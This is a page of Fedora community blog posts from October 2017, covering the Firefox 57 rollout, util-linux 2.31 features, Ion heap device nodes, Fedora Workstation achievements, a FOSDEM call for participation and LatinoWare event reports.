Wie das Fedora-Magazine in einem Artikel zu Firefox 57 schreibt, wird Fedora 27 kurz nach dem Release das Update auf Firefox 57 erhalten. Nutzer von Fedora 26 werden hingegen noch etwas länger auf das Update warten müssen, da es aufgrund der massiven Änderungen in der Version länger als gewöhnlich im Update-Testing Repository bleibt, damit Nutzer die Möglichkeit haben, zu prüfen, ob ihre Erweiterungen auch mit Firefox 57 funktionieren. Fedora 25 hingegen wird kein Update mehr auf Firefox 57 erhalten.

Grund für diese unterschiedliche Update-Praxis bei Fedora 26 und 27 ist, das Fedora 27 bereits seit einiger Zeit die Beta-Versionen von Firefox 57 in seinen Repositories enthält und Nutzer von Fedora 27 somit quasi einen gewissen Vorsprung haben, was das Testen ihrer Extensions angeht.

Where Did That Software Come From?

Posted by Russel Doty on October 20, 2017 05:29 PM

I have an article in the Oct. 9 issue of Military Embedded Systems magazine on software provenance titled Where Did That Software Come From?

Where did the software on your embedded system come from? Can you prove it? Can you safely update systems in the field? Cryptography provides the tools for verifying the integrity and provenance of software and data. There is a process as to how users can verify the source of software, if it was tampered with in transit, and if it was modified after installation.

The article explores how cryptography, especially hashing and code signing, can be use to establish the source and integrity. It examines how source code control systems and automated build systems are a key part of the software provenance story.  (Provenance means “a record of ownership of a work of art or an antique, used as a guide to authenticity or quality.” It is increasingly being applied to software.)

As an interesting side note, the article describes how the git version control system is very similar to a blockchain.


Fedora meets RHEL

Posted by Debarshi Ray on October 20, 2017 02:36 PM

As we enter the final freeze before the Fedora 27 Workstation release, I’d like to highlight a new feature that will hopefully make Fedora more attractive for developers. Last month, I had written about our experiments to make it easier to consume gratis, self-supported Red Hat Enterprise Linux installations from Fedora Workstation. I am happy to report that this is now a reality.

gnome-boxes-new-source-selection-rhel

Starting from Fedora 27 Workstation, you’ll be able to install an infinite number of RHEL 7.x VMs right from inside GNOME Boxes. All you need is an account on developers.redhat.com, and it will automatically set up a RHEL virtual machine that’s entitled to the RHEL Developer Suite subscription.

gnome-boxes-new-source-selection-rhel-01

Thanks to Felipe Borges for a seemingly endless round of patch reviews, and Fabiano and Victor for occasionally lending us their brain.


Firefox 57 coming soon: a Quantum leap

Posted by Fedora Magazine on October 20, 2017 08:00 AM

A few packages in Fedora get major updates outside the regular release cycle. The kernel is one of these, and Firefox is another. The maintainers do their best to handle these situations. Of course they always try to avoid any breaking changes to the user experience. However, there are times an upstream provides a path that makes this unavoidable. One of those rare situations is happening at present.

Upstream work on Firefox 57

Over the past year, Mozilla has been working on a series of major changes to the Firefox browser, mainly for performance and security. These changes are referred to as Project Quantum. Some improvements arrived already with no major differences for its users.

Last month the major changes landed in the developer channel. These changes mark a major deadline for how extensions work. This deadline gave third party developers a chance to look at their extensions and make changes to remain compatible. It was an important milestone date for the various Firefox add-ons. Firefox 57 marks an end to the legacy XUL based extensions. Starting with version 57, Firefox supports only a new type of extension, named WebExtension.

This shouldn’t be a surprise to Firefox extension developers, though. The compatibility roadmap has been known for the past year. Those who maintain their own extensions should read through the general upstream documentation on the change and the specific porting guide, as well.

User visible changes

Of course, developers following the Mozilla blogs have been aware of this change for a while. But the question remains: what does this mean for users?

The WebExtensions API is a cross-platform initiative. Therefore, this change means more extensions shared between Chrome, Opera and Firefox and the larger community. That should lead to better quality extensions overall. For the past several months, extension developers have been porting and giving feedback to Mozilla with APIs they require. Over 5000 extensions from addons.mozilla.org have been converted to remain compatible with version 57 and onward.

Users probably shouldn’t “hold back at FF56 as my favorite extensions don’t work.” Recall that security fixes only come from new versions, and they’ll all be WebExtension only. The Extended Support Release version will also switch to WebExtensions only at the next release. This date, June 2018, marks the deadline for ESR users to migrate their extensions.

Check which extensions you use that aren’t supported, and investigate if there’s a replacement or a beta test build by the developer. An upstream effort tracks whether many popular extensions have been ported yet, and related Mozilla bugs.

In addition to the extension changes, there are UI changes (codename Photon) as well as HTML, CSS and JavaScript rendering additions and fixes. Although the present beta release notes are brief, they link to further articles on the changes. Users and system administrators should read them to be prepared.

How Fedora is handling Firefox 57

Firefox 57 release is scheduled for November 14; Fedora 27 releases a week or so before that. The current Fedora 27 beta has the Firefox 57 beta. Fedora intends to have the Firefox 57 final release in a Fedora 27 update. This will be a significant part of the Fedora 27 Workstation release. If you use extensions, you’ll want to be aware of this plan.

Once Mozilla releases version 57, it will be submitted to the Fedora 26 updates-testing repository for an extended period. This provides adequate time for users to check their extensions before the update is promoted. However, this update will come to the stable repos for Fedora 26.

Between now and that point, a COPR provides builds for early testing of the builds, updated with any changes from the Fedora 27 release. Note that you cannot return to the older release on the same profile, due to changes in the update. Bear that in mind before installing this early release. You may want to make a backup of the existing profile before you update. This COPR will be removed when Firefox 57 reaches the Fedora 26 updates-testing repository.

To test these early package builds and provide early feedback of any issues, follow the usual COPR instructions to enable the repository and install the software:

dnf copr enable jhogarth/firefox57
dnf update firefox

When version 57 reaches the testing repository of Fedora 26 and the COPR is no longer required, remove it. This gets you the official Firefox maintainer’s builds and a clean future upgrade to Fedora 27:

dnf clean all
dnf copr remove jhogarth/firefox57

Providing feedback on the upcoming packages

Is the thought of testing the upcoming Firefox tempting? Then please follow these guidelines so maintainers can more easily handle your reported issues.

  • The Fedora 25 builds are entirely unsupported and provided only as a convenience for testing. Only Fedora 26 will receive the Firefox 57 update in the official Fedora repositories.
  • The COPR is provided by the author, a Fedora Packager, not the Mozilla maintenance team, though it is a coordinated effort. The author will try to get updates into place as soon as possible after updates in Fedora 27. These RPMs are not identical to those that will appear in Fedora, although built from the same spec files and sources as in Fedora’s git repositories.
  • Please only report Firefox issues and not any extension issues to Bugzilla. If in doubt, please try to reproduce the issue with extensions disabled.
  • Please use Bugzilla. Do not mail anyone directly.

To report any issues with Firefox 57 on Fedora, use the standard bugzilla report, and please note in the report that you’re using these packages.

Thursday 19 oct, was the second day of LatinoWare and temperature go low to 25ºC after a heavy storm...

Posted by Wolnei Tomazelli Junior on October 20, 2017 02:15 AM
Thursday 19 oct, was the second day of LatinoWare and temperature go low to 25ºC after a heavy storm. Unfortunately was damaged part of event infrastructure, but happily after a hard work everything back to normal at 1 pm of today.
We have our first FudMeeting at room Venezuela, from 10am to 5pm, with many great talks about Ansible, oVirt, ARM, How start contribute, Packaging and Translation. In result of this day will be one more traducer and website contributor do Fedora Project.
Closest to our room, many children was playing with educational robotics and using Fedora Robotics to upload their code to their ARM board.
Closing the day, employers of ITAIPU offer us a nice pizza dinner and a amazing surprise of live show of rock band. The band play very well many Brazilian rock classics and made all people get up to dance and sing together.

http://latinoware.org/1o-fudmeeting/ #fedora #latinoware #linux

20/10/2017


Resigning from Fedora Council for Fedora 27

Posted by Justin W. Flory on October 19, 2017 09:08 PM
FAmSCo August 2017 elections: Thoughts on a global community

Since I became a Fedora contributor in August 2015, I’ve spent a lot of time in the community. One of the great things about a big community like Fedora is that there are several different things to try out. I’ve always tried to do the most help in Fedora with my contributions. I prefer to make long-term, in-depth contributions than short-term, “quick fix”-style work. However, like many others, Fedora is a project I contribute to in my free time. Over the last month, I’ve come to a difficult realization.

After deep consideration, I am resigning from the Fedora Council effective at the end of the Fedora 26 release cycle.

Why I’m stepping back

When I decided to run for Fedora Council in July, I had not yet moved back to Rochester, New York. From my past experiences, I didn’t predict an issue to fulfill my commitments to the Fedora community. However, since moving back to Rochester, it is difficult to fulfill my expectations, Council and otherwise, to Fedora.

I’m entering the last years of my degree and the rigor of my coursework demands more time and focus. Additionally, I’m working more hours this year than I have in the past, which takes away more time Fedora. Because student loans are too real.

If I expected these changes, I would not have run for the Council. However, from my short time on the Council, I understand the energy and dedication needed to represent the community effectively. During my campaign and term, this was my driving motivation – to do my best to represent an international community of thousands in the highest body of leadership in Fedora. Now, I do not feel I am meeting my standard of participation and engagement. Already, I’ve stepped back from the Fedora Magazine and Marketing teams to focus more time in other areas of Fedora. Now, it is right to do the same for the Council.

I will spend the most time in the CommOps and Diversity teams, since I believe that is where I can make the largest impact as a contributor.

Fedora 27 Council elections

I privately shared my resignation with the Fedora Council before writing this post. After discussing with other Council members, the plan is

  1. Elect a new, full-term Council member for Fedora 27 and 28
  2. Elect a new, half-term Council member for only Fedora 27

In past elections with half-term seats, the candidate with the most votes receives the full-term seat and the runner-up receives the half-term seat. I expect this to happen again, although final details will come once the election phase begins.

Thank you for your trust

This is one of the most difficult decisions I’ve made in Fedora. Serving on the Fedora Council is the greatest privilege. My election to the Council by hundreds of people was humbling and inspired me to not only lead by example, but represent the perspective of the greater Fedora community to the Council. This was the greatest honor for me and it disappoints me to finish my term early.

However, based on current circumstances, I believe this is the best path forward to make sure the community is well-represented in Fedora leadership. Thank you for your trust and I hope I can return to serve the community in this capacity someday in the future.

The post Resigning from Fedora Council for Fedora 27 appeared first on Justin W. Flory's Blog.

Cómo configurar sus dispositivos para la protección de la privacidad.

Posted by Fernando Espinoza on October 19, 2017 08:03 PM

Las computadoras, los teléfonos inteligentes y los aparatos conectados a Internet han hecho nuestras vidas más fáciles hasta el punto en que estaríamos atrapados sin ellos. Por otro lado, cuanto más confiamos en ellos, más datos pasan a través de ellos y potencialmente fuera de nuestro control. Lamentablemente, estos dispositivos a menudo están mal protegidos por la... Seguir leyendo →


Looking back at Fedora Workstation so far

Posted by Christian F.K. Schaller on October 19, 2017 06:35 PM

So I have over the last few years blogged regularly about upcoming features in Fedora Workstation. Well I thought as we putting the finishing touches on Fedora Workstation 27 I should try to look back at everything we have achieved since Fedora Workstation was launched with Fedora 21. The efforts I highlight here are efforts where we have done significant or most development. There are of course a lot of other big changes that has happened over the last few years by the wider community that we leveraged and offer in Fedora Workstation, examples here include things like Meson and Rust. This post is not about those, but that said I do want to write a post just talking about the achievements of the wider community at some point, because they are very important and crucial too. And along the same line this post will not be speaking about the large number of improvements and bugfixes that we contributed to a long list of projects, like to GNOME itself. This blog is about taking stock and taking some pride in what we achieved so far and major hurdles we past on our way to improving the Linux desktop experience.
This blog is also slightly different from my normal format as I will not call out individual developers by name as I usually do, instead I will focus on this being a totality and thus just say ‘we’.

  • Wayland – We been the biggest contributor since we joined the effort and have taken the lead on putting in place all the pieces needed for actually using it on a desktop, including starting to ship it as our primary offering in Fedora Workstation 25. This includes putting a lot of effort into ensuring that XWayland works smoothly to ensure full legacy application support.
  • Libinput – A new library we created for handling all input under both X and Wayland. This came about due to needing input handling that was not tied to X due to Wayland, but it has even improved input handling for X itself. Libinput is being rapidly developed and improved, with 1.9 coming out just a few days ago.
  • glvnd – Dealing with multiple OpenGL implementations have been a pain under Linux for years. We worked with NVidia on this effort to ensure that you can install multiple OpenGL implementations on the system and have your system be able to use the correct one depending on which GPU and driver you are using. We keep expanding on this solution to cover more usecases, so for Fedora Workstation 27 we expect to bring glvnd support to XWayland for instance.
  • Porting Firefox to GTK3 – We ported Firefox to GTK3, including making sure it works under Wayland. This work also provided the foundation for HiDPI support in Firefox. We are the single biggest contributor to Firefox Linux support.
  • Porting LibreOffice to GTK3 – We ported LibreOffice to GTK3, which included Wayland support, touch support and HiDPI support. Our team is one of the major contributors to LibreOffice and help the project forward on a lot of fronts.
  • Google Drive integration – We extended the general Google integration in GNOME 3 to include support for Google Drive as we found that a lot of our users where relying on Google Apps at their work.
  • Flatpak – We created Flatpak to lead the way in moving desktop applications into their own namespaces and containers, resolving a lot of long term challenges for desktop applications on Linux. We expect to have new infrastructure in place in Fedora soon to allow Fedora packagers to quickly and easily turn their applications into Flatpaks.
  • Linux Firmware Service – We created the Linux Firmware service to provide a way for Linux users to get easy access to UEFI firmware on their linux system and worked with great vendors such as Dell and Logitech to get them to support it for their devices. Many bugs experienced by Linux users over the years could have been resolved by firmware updates, but with tooling being spotty many Linux users where not even aware that there was fixes available.
  • GNOME Software – We created GNOME Software to give us a proper Software Store on Fedora and extended it over time to include features such as fonts, GStreamer plugins, GNOME Shell extensions and UEFI firmware updates. Today it is the main Store type application used not just by us, but our work has been adopted by other major distributions too.
  • mp3, ac3 and aac support – We have spent a lot of time to be able to bring support for some of the major audio codecs to Fedora like MP3, AC3 and AAC. In the age of streaming supporting codecs is maybe of less importance than it used to be, but there is still a lot of media on peoples computers they need and want access to.
  • Fedora Media Creator – Cross platform media creator making it very easy to create Fedora Workstation install media regardless of if you are on Windows, Mac or Linux. As we move away from optical media offering ISO downloads started feeling more and more outdated, with the media creator we have given a uniform user experience to quickly create your USB install media, especially important for new users coming in from Windows and Mac environments.
  • Captive portal – We added support for captive portals in Network Manager and GNOME 3, ensuring easy access to the internet over public wifi networks. This feature has been with us for a few years now, but it is still a much appreciated addition.
  • HiDPI support – We worked to add support for HiDPI across X, Wayland, GTK3 and GNOME3. We lead the way on HiDPI support under Linux and keep working on various applications to this date to polish up the support.
  • Touch support – We worked to add support for touchscreens across X, Wayland, GTK3 and GNOME3. We spent significant resources enabling this, both on laptop touchscreens, but also to support modern wacom devices.
  • QGNOME Platform – We created the QGNOME Platform to ensure that Qt applications work well under GNOME3 and gives a nice native and integrated feel. So while we ship GNOME as our desktop offering we want Qt applications to work well and feel native. This is an ongoing effort, but for many important applications it already is a great improvement.
  • Nautilus improvements. Nautilus had been undermaintained for quite a while so we had Carlos Soriano spend significant time on reworking major parts of it and adding new features like renaming multiple files at ones, updating the views and in general bring it up to date.
  • Night light support in GNOME – We added support for automatic adjusting the color and light settings on your system based on light sensors found in modern laptops. This integrated functionality that you before had to install extra software like Red Shift to enable.
  • libratbag – We created a library that enable easy configuration of high end mice and other kind of input devices. This has led to increased collaboration with a lot of gaming mice manufacturers to ensure full support for their devices under Linux.
  • RADV – We created a full open source Vulkan implementation for ADM GPUs which recently got certified as Vulkan compliant. We wanted to give open source Vulkan a boost, so we created the RADV project, which now has an active community around it and is being tested with major games.
  • GNOME Shell performance improvements – We been working on various performance improvements to GNOME Shell over the last few years, with significant improvements having happened. We want to push the envelope on this further though and are planning a major performance hackfest around Shell performance and resource usage early next year.
  • GNOME terminal developer improvements – We worked to improve the features of GNOME Terminal to make it an even better tool for developers with items such as easier naming of terminals and notifications for long running jobs.
  • GNOME Builder – Improving the developer story is crucial for us and we been doing a lot of work to make GNOME Builder a great tool for developer to use to both improve the desktop itself, but also development in general.
  • Pipewire – We created a new media server to unify audio, pro-audio and video. First version which we are shipping in Fedora 27 to handle our video capture.
  • Fleet Commander – We launched Fleet Commander our new tool for managing large Linux desktop deployments. This answer a long standing call from many of Red Hats major desktop customers and many admins of large scale linux deployments at Universities and similar for a powerful yet easy to use administration tool for large desktop deployments.

I am sure I missed something, but this is at least a decent list of Fedora Workstation highlights for the last few years. Next onto working on my Fedora Workstation 27 blogpost :)

Splitting the Ion heaps

Posted by Laura Abbott on October 19, 2017 06:00 PM

One of the requests before Ion moves out of staging is to split the /dev interface into multiple nodes. The way Ion allocation currently works is by calling ioctls on /dev/ion. This certainly works but requires that Ion have a fairly permissive set of privileges. There's not an easy1 way to restrict access to certain heaps. Splitting access out into /dev/ion0, /dev/ion1 etc. makes it possible to set Unix and selinux permissions per heap. Benjamin Gaignard has been working on some proposals to make this work.

I decided to give this a boot and run a few tests. Everything came up okay in my buildroot based environment but I didn't see /dev/ion0, /dev/ion1 on my Android system. Creation of the device nodes is the responsibility of userspace so it wasn't too surprising to see at least some problems. On most systems, this is handled by some subset of udev, which might be part of systemd or some other init subsystem. Android being Android uses its own setup for device initialization.

My preferred Android board these days is a HiKey development board. Linaro has done a fantastic job of getting support for this board in AOSP so I can work off of AOSP master or one of the branches to do development. By default, AOSP ships a binary kernel module based on whatever branch they are shipping but John Stultz keeps a git tree with a branch that tracks mainline pretty closely. With this setup, I can recompile and test almost any part of the system I want (except for the Mali blobs of course).

The Android init system provides an option to log uevents. This was useful for seeing exactly what was going on. The logs showed the init system probing some typical set of the /sys hierarchy. The Ion nodes weren't on that list though, so the Android init system wasn't finding it in /sys. This is what I found in /sys/devices/ on my qemu setup:

# ls /sys/devices/
LNXSYSTM:00  ion0         msr          platform     software     tracepoint
breakpoint   ion1         pci0000:00   pnp0         system       virtual

ion0 and ion1 are present in the /sys hierarchy but not where one might have expected. This was a side-effect of how the underlying devices were set up in the kernel. I'm not very familiar with the device model so I'm hoping to see more feedback on a proper solution. Progress always takes time...


  1. You can do some filtering with seccomp but that's not the focus here. 

util-linux v2.31 -- what's new?

Posted by Karel Zak on October 19, 2017 01:23 PM
uuidparse -- this is a new small command to get more information about UUIDs "hash". The command provides info about UUID type, variant and time. For example:

$ (uuidgen; uuidgen -t) | uuidparse
UUID VARIANT TYPE TIME
8f251893-d33a-40f7-9bb3-36988ec77527 DCE random
66509634-b404-11e7-aa8e-7824af891670 DCE time-based 2017-10-18 15:01:04,751570+0200

The command su has been refactored and extended to create pseudo terminal for the session (new option --pty). The reason is CVE-2016-2779, but the issue addressed by this CVE is pretty old and all the problem is silently ignored for for years on many places (on only su(1)). The core of the problem is that unprivileged user (within su(1) session) shares terminal file descriptor with original root's session. The new option --pty forces su(1) to create independent pseudo terminal for the session and than su(1) works as proxy between the terminals. The feature is experimental and not enabled by default (you have to use su --pty).

standard su session (all on pts/0):
               
24909 pts/0 S 0:02 \_ -bash
13607 pts/0 S 0:00 \_ su - kzak
13608 pts/0 S 0:00 \_ -bash
13679 pts/0 R+ 0:00 \_ ps af

su --pty session (root pts/0; user pts/5):
               
24909 pts/0 S 0:02 \_ -bash
13857 pts/0 S+ 0:00 \_ su --pty - kzak
13858 pts/5 Ss 0:00 \_ -bash
13921 pts/5 R+ 0:00 \_ ps af

rfkill -- this is a new command in util-linux. The command was originally written by Johannes Berg and Marcel Holtmann and maintained for years as standalone package. We believe that it's better to maintain and distribute it with another commands on one place. The util-linux version is backwardly compatible with the original implementations. The command has been also improved (libsmartcols ouotput, etc.), the new default output:
# rfkill       
ID TYPE DEVICE SOFT HARD
0 bluetooth tpacpi_bluetooth_sw unblocked unblocked
1 wlan phy0 unblocked unblocked
4 bluetooth hci0 blocked unblocked

The library libuuid and command uuidgen support hash-based UUIDs v3 (md5) and v5 (sha1) as specified by RFC-4122 now. The library also provides UUID templates for dns, url, oid, or x500. For example:
 
$ uuidgen --sha1 --namespace @dns --name foobar.com
e361e3ab-32c6-58c4-8f00-01bee1ad27ec

and it's expected to use v3 and v5 UUIDs as hierarchy, so you can use this UUID (or arbitrary other UUID) as a namespace:
 
$ uuidgen --sha1 --namespace e361e3ab-32c6-58c4-8f00-01bee1ad27ec --name mystuff
513f905c-7df2-5afa-9470-4e82382dbf00

I can imagine system where for example per-user or per-architecture partition UUIDs are based on this system. For example use UUID specific for the system root as --namespace and username as --name, or so. 

wipefs and libblkid have been improved to provide all possible string permutations for a device. It means that wipefs does not return the first detected signature, but it continues and tries another offsets for the signature. This is important for filesystems and partitions tables where the superblock is backuped on multiple places (e.g. GPT) or detectable by multiple independent ways (FATs). This all is possible without a device modification (the old version provides the same, but only in "wipe" mode). 

The libfdisk has been extended to use BLKPG ioctls to inform the kernel about changes. This means that cfdisk and fdisk will not force your kernel to reread all of the partition table, but untouched partitions may remain mounted and used by the system. The typical use-case is resizing the last partition on the system disk. 

You can use cfdisk to resize a partition. Yep, cool.

The hwclock command now significantly reduces system shutdown times by not reading the RTC before setting it (except when the --update-drift option is used). This also mitigates other potential shutdown and RTC setting problems caused by requiring an RTC read.



FOSDEM 2018 Real-Time Communications Call for Participation

Posted by Daniel Pocock on October 19, 2017 08:33 AM

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2018 takes place 3-4 February 2018 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • related events around FOSDEM, including the XMPP summit,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs

Call for participation - Real Time Communications (RTC)

The Real-Time dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Sunday, 4 February 2018. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the FSFE-sponsored Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 30 November. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real Time Communications devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. It is encouraged to apply to more than one dev-room and also consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 3 November. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes, presentations aimed at developers of free and open source software about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators based on the received proposals. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming, volunteers are needed to assist in this
  • organizing one or more restaurant bookings (dependending upon number of participants) for the evening of Saturday, 4 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (text version) to other mailing lists

Related events - XMPP and RTC summits

The XMPP Standards Foundation (XSF) has traditionally held a summit in the days before FOSDEM. There is discussion about a similar summit taking place on 2 February 2018. XMPP Summit web site - please join the mailing list for details.

Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 2 February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email (text version). If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

Planet site Admin contact
All projects Free-RTC Planet (http://planet.freertc.org) contact planet@freertc.org
XMPP Planet Jabber (http://planet.jabber.org) contact ralphm@ik.nu
SIP Planet SIP (http://planet.sip5060.net) contact planet@sip5060.net
SIP (Español) Planet SIP-es (http://planet.sip5060.net/es/) contact planet@sip5060.net

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.

Contact

For any private queries, contact us directly using the address fosdem-rtc-admin@freertc.org and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

Teaching metrics and contributor docs at Flock 2017

Posted by Fedora Community Blog on October 19, 2017 08:30 AM

The Fedora Community Operations (CommOps) team held an interactive workshop during the annual Fedora contributor conference, Flock. Flock took place from August 29th to September 1st in Cape Cod, Massachusetts. Justin W. Flory and Sachin Kamath represented the team in the workshop. CommOps spends a lot of time working with metrics and data tools available in Fedora, like fedmsg and datagrepper. Our workshop introduced some of the tools to work with metrics in Fedora and how to use them. With our leftover time, we discussed the role of contributor-focused documentation in the wiki and moving it to a more static place in Fedora documentation.

What does CommOps do?

The beginning of the session introduced the CommOps team and explained our function in the Fedora community. There’s two different skill areas in the CommOps team: one focuses on data analysis and the other focuses on non-technical community work. The motivation for CommOps was explained too. The team’s mission is to bring more heat and light into the project, where light is exposure and awareness, and heat is more activity and contributions. Our work usually follows this mission for either technical or non-technical tasks.

At the beginning of the workshop, metrics were the main discussion point. CommOps helps generate metrics and statistical reports about activity in Fedora. We wanted to talk more about the technical tools we use and how others in the workshop could use them for their own projects in Fedora.

What are Fedora metrics?

fedmsg is the foundation for all metrics in Fedora. fedmsg is a message bus that connects the different applications in Fedora together. All applications and tools used by Fedora contributors emit messages into fedmsg. This includes git commits, Koji build status, Ansible playbook runs, adding a member to a FAS group, new translations, and more. Together, the data is meaningless and is difficult to understand. In the #fedora-fedmsg channel on Freenode, you can see all the fedmsg activities in the project (you can see the project “living”!). The valuable part is when you take the data and filter it down into something meaningful.

One of the examples from the workshop was the analysis of FOSDEM and community engagement by CommOps contributor Bee Padalkar. In her report, she determined our approximate impact in the community at FOSDEM. Using Fedora Badges, it revealed how many people we interacted with at FOSDEM and how they engaged with the Fedora community before and after the conference.

The metrics tools in Fedora help make this research possible. One of the primary goals of our workshop was to introduce the metrics tools and how to use them for the audience. We hoped to empower people to build and generate metrics of their own. We also talked about some of the plans by the team to advance use of metrics further.

Introducing the CommOps toolbox

The CommOps toolbox is a valuable resource for the data side of CommOps. Our virtual toolbox is a list of all the metrics and data tools available for use and a short description of how they’re used. You can see the toolbox on the wiki.

Sachin led this part of the workshop and explained some of the most common tools. He introduced what a fedmsg publication looked like and helped explain the structure of the data. Next, he introduced Datagrepper. Datagrepper helps you pull fedmsg data based on a set of filters. With your own filters, you can customize the data you see to make comparisons easier. Complex queries with Datagrepper are powerful and help bring insights into various parts of the project. When used effectively, it provides insight into potential weak spots in a Fedora-related project.

Finally, Sachin also introduced his Google Summer of Code (GSoC) 2016 project, gsoc-stats. gsoc-stats is a special set of pre-defined filters to create contribution profiles for individual contributors. It breaks down where a contributor spends most of their time in the project and what type of work they do. Part of its use was for GSoC student activity measurements, but it has other uses as well.

What is Grimoire Lab?

Sachin is leading progress on a new tool for CommOps called Grimoire Lab. Grimoire Labs is a visual dashboard tool that lets a user create charts, graphs, and visual measurements from a common data source. The vision for Grimoire Lab in Fedora is to build an interactive dashboard based off of fedmsg data. Using the data, anyone could create different gauges and measurements in an easy-to-understand chart or graph. This helps make the fedmsg data more accessible for others in the project to use, without making them write their own code to create graphic measurements.

Most of the time for Grimoire Lab in the workshop was explaining its purpose and expected use. Sachin explained some of the progress made so far to make the tool available in Fedora. This goal is to get it hosted inside of Fedora’s infrastructure next. We hope to deliver on an early preview of this over the next year.

Changing the way we write contributor documentation

The end of our workshop focused on non-technical tasks. We had a few tickets highlighted but left it open to the audience interest to direct the discussion. One of the attendees, Brian Exelbierd, started a discussion about the Fedora Documentation team and some of the changes they’ve made over the last year. Brian introduced AsciiDoc and broke down the workflow that the Docs team uses with the new tooling. After explaining it, the idea came up of hosting contributor-focused information in a Fedora Docs-style project, instead of the wiki.

The two strong benefits of this approach is to keep valuable information updated and to make it easily accessible. Some common wiki pages for the CommOps team came up, like the pages explaining how to join the team and how to get “bootstrapped” in Fedora. After Brian’s explanation of the tools, the new Docs tool chain felt easy to keep up and effective promoting high-value content for contributors out of the wiki. Later during Flock, on Thursday evening, Brian organized a mini workshop to extend this idea further and teach attendees how to port content over.

CommOps hopes to be an early example of a team to use this style of documentation for our contributor-focused content. Once we are comfortable with the set-up and have something to show to others, we want to document how we did and explain how other teams can do it too. We hope to carry this out over the Fedora 27 release cycle.

See you next year!

Flock 2017 was a conference full of energy and excitement. The three-hour workshop was useful and effective for CommOps team members to meet and work out plans for the next few release cycles in the same room. In addition to our own workshop, spending time in other workshops was also valuable for our team members to see what others in Fedora are doing and where they need help.

A special thanks goes out to all the organizing staff, for both the bid process and during the conference. Your hard work helps drive our community forward every year by feeling more like a community of people, in an open source world where we mostly interact and work together over text messaging clients and emails.

We hope to see you next year to show you what we accomplished since last Flock!

The post Teaching metrics and contributor docs at Flock 2017 appeared first on Fedora Community Blog.

Today, Wednesday 18 oct, was the first day of LatinoWare fourteen edition hosted in the city of Foz ...

Posted by Wolnei Tomazelli Junior on October 19, 2017 12:10 AM
Today, Wednesday 18 oct, was the first day of LatinoWare fourteen edition hosted in the city of Foz do Iguaçu in Parana state with presence of 4552 participants and temperature of 37ºC. Currently this is the biggest event of free software in Brazil.
Early morning we took Latinoware bus to Itaipu Technological Park. We set up the Fedora Project stand with banner and five type of stickers for the winners of a traditional quiz. All the ambassadors present in our stand, catch from imagination a question about Fedora to ask participants.
Between our quick quiz, many persons came by our stand to ask some question about use Fedora or how contribute in some our projects, today indicate one more person to start contribute in Translation team.
At the end of morning, 11am on room Peru, Daniel Lara gave his first talk about Virtualization to users, where try convince people to use KVM instead of VirtualBox. In lunch hour, 12pm on room Brazil, Dennis Gilmore gave his first talk about What Open Source can do for you and to World, where demonstrated his experience in develop with free software for more than twenty years.
In the rest of my afternoon helped a Fedora 64-bit Workstation installation on a notebook and demonstrated KDE interface to a indecisive user.

#fedora #latinoware #linux #FozIguacu

18/10/2017


Deliberate Elevation of Privileges

Posted by Adam Young on October 18, 2017 07:31 PM

“Ooops.” — Me, doing something as admin that I didn’t mean to do.

While the sudo mechanism has some warranted criticism, it is still an improvement on doing everything as the root account. The essential addition that sudo provides for the average sys admin is the ability to only grant themselves system admin when they explicitly want it.

I was recently thinking about a FreeIPA based cluster where the users did not realize that they could get admin permissions by adding themselves to the user group admins. One Benefit to the centralized admin account is that a user has to chose to operate as admin to perform the operation. If a hacker gets the users password, they do not get admin. However, the number of attacks and weaknesses in this approach far outweigh the benefits. Multiple people need to know the password, revoking it for one revokes it for everyone, anyone can change the password, locking everyone else out, and so on.

We instead added a few key individuals to the admins group and changed the password on the admin account.

